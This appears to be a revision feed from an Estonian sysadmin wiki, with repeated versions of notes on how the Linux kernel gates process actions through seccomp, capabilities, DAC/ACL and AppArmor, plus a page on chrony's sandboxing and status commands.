/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

seccomp leiab kõneks olevad syscallid üles nn bpf-classic filtrite abil, antud juhul 23 tükki (neid ei esita bpftool prog show)

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep Seccomp
Seccomp: 2
Seccomp_filters: 23
</pre>

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-04T00:03:03Z

Imre: /* Tööpõhimõte */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root, siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

seccomp leiab kõneks olevad syscallid üles nn bpf-classic filtrite abil, antud juhul 23 tükki (neid ei esita bpftool prog show)

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep Seccomp
Seccomp: 2
Seccomp_filters: 23
</pre>

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-04T00:02:29Z

Imre: /* Tööpõhimõte */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

seccomp leiab kõneks olevad syscallid üles nn bpf-classic filtrite abil, antud juhul 23 tükki (neid ei esita bpftool prog show)

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep Seccomp
Seccomp: 2
Seccomp_filters: 23
</pre>

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Chrony

2026-05-03T23:23:18Z

Imre: /* Misc - chrony protsess */

===Sissejuhatus===

TODO

===Tööpõhimõte===

TODO

===Misc - chrony protsess===

chronyd protsessi info

<pre>
root@pve-svc-02:~# pgrep chronyd
1436092
1436093
root@pve-svc-02:~# lsns -p 1436093
NS TYPE NPROCS PID USER COMMAND
4026531833 net 481 1 root /sbin/init
4026531834 time 481 1 root /sbin/init
4026531835 cgroup 481 1 root /sbin/init
4026531836 pid 481 1 root /sbin/init
4026531837 user 481 1 root /sbin/init
4026531839 ipc 481 1 root /sbin/init
4026533035 mnt 2 1436092 _chrony ├─/usr/sbin/chronyd -F 1
4026533036 uts 2 1436092 _chrony └─/usr/sbin/chronyd -F 1
</pre>

seccomp leiab oma syscallid üles bfp-classic filtrite abil (neid ei esita 'bpftool prog show')

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep -i seccomp
Seccomp: 2
Seccomp_filters: 23

root@pve-svc-02:~# nsenter -m -t 1436092 findmnt | grep inacc | sed -r 's/tmpfs\s+.*//'
│ └─/dev/kmsg tmpfs[/systemd/inaccessible/chr]
│ ├─/run/credentials tmpfs[/systemd/inaccessible/dir]
│ ├─/run/user tmpfs[/systemd/inaccessible/dir]
├─/root tmpfs[/systemd/inaccessible/dir]
├─/home tmpfs[/systemd/inaccessible/dir]
├─/usr/lib/modules tmpfs[/systemd/inaccessible/dir]
</pre>

ning capabilities

<pre>
root@pve-svc-02:~# pscap -p 1436092
ppid pid uid command capabilities
1 1436092 _chrony chronyd net_bind_service, sys_time +

root@pve-svc-02:~# pscap -p 1436093
ppid pid uid command capabilities
1436092 1436093 _chrony chronyd net_bind_service, sys_time +
</pre>

või getpcaps abil (ep - effective, permitted)

<pre>
root@pve-svc-02:~# getpcaps 1436092
1436092: cap_net_bind_service,cap_sys_time=ep
</pre>

või /proc/PID/status abil

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep ^Cap
CapInh: 0000000000000000
CapPrm: 0000000002000400
CapEff: 0000000002000400
CapBnd: 000001c08380fddf
CapAmb: 0000000000000000

root@pve-svc-02:~# capsh --decode=0000000002000400
0x0000000002000400=cap_net_bind_service,cap_sys_time
</pre>

kus

* CapInh: Inheritable (can be passed to children).
* CapPrm: Permitted (the maximum "credit limit" of authority).
* CapEff: Effective (the authority currently being used).
* CapBnd: Bounding (the hard ceiling that cannot be exceeded).
* CapAmb: Ambient (applies to unprivileged non-setuid binaries).

ning

<pre>

</pre>

ning systemd vastavad seadistused

<pre>
root@pve-svc-02:~# systemctl show chrony | egrep "^Prot|^Priv|^Capab" | egrep "restore$|yes$"
CapabilityBoundingSet=cap_chown cap_dac_override cap_dac_read_search cap_fowner cap_fsetid cap_setgid cap_setuid cap_setpcap cap_net_bind_service cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock cap_ipc_owner cap_sys_nice cap_sys_resource cap_sys_time cap_setfcap cap_perfmon cap_bpf cap_checkpoint_restore
PrivateTmp=yes
ProtectKernelTunables=yes
ProtectKernelModules=yes
ProtectKernelLogs=yes
ProtectControlGroups=yes
ProtectControlGroupsEx=yes
ProtectHome=yes
ProtectHostname=yes
</pre>

===Misc - chrony teenus===

Seadistus

<pre>
root@pve-svc-02:~# egrep "pool|server" /etc/chrony/chrony.conf
# pool 2.debian.pool.ntp.org iburst

root@pve-svc-02:~# cat /etc/chrony/sources.d/local-ntp-server.sources
server 10.192.0.53 iburst
</pre>

sources info

<pre>
root@pve-svc-02:~# chronyc sources -v -n

.-- Source mode '^' = server, '=' = peer, '#' = local clock.
/ .- Source state '*' = current best, '+' = combined, '-' = not combined,
| / 'x' = may be in error, '~' = too variable, '?' = unusable.
|| .- xxxx [ yyyy ] +/- zzzz
|| Reachability register (octal) -. | xxxx = adjusted offset,
|| Log2(Polling interval) --. | | yyyy = measured offset,
|| \ | | zzzz = estimated error.
|| | | \
MS Name/IP address Stratum Poll Reach LastRx Last sample
===============================================================================
^* 10.192.0.53 4 9 377 413 -135us[ -216us] +/- 3171us
</pre>

tracking info

<pre>
root@pve-svc-02:~# chronyc tracking
Reference ID : 0AC00035 (10.192.0.53)
Stratum : 5
Ref time (UTC) : Sun May 03 17:25:18 2026
System time : 0.000016197 seconds slow of NTP time
Last offset : -0.000080330 seconds
RMS offset : 0.000049475 seconds
Frequency : 0.712 ppm fast
Residual freq : -0.006 ppm
Skew : 0.085 ppm
Root delay : 0.006004042 seconds
Root dispersion : 0.000445185 seconds
Update interval : 517.6 seconds
Leap status : Normal
</pre>

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-03T23:21:49Z

Imre: /* seccomp */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt (käigult konstrueeritakse efektiivselt sobivad capacitid)
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root siis see on samaväärne kõigi capacitite olemasoluga

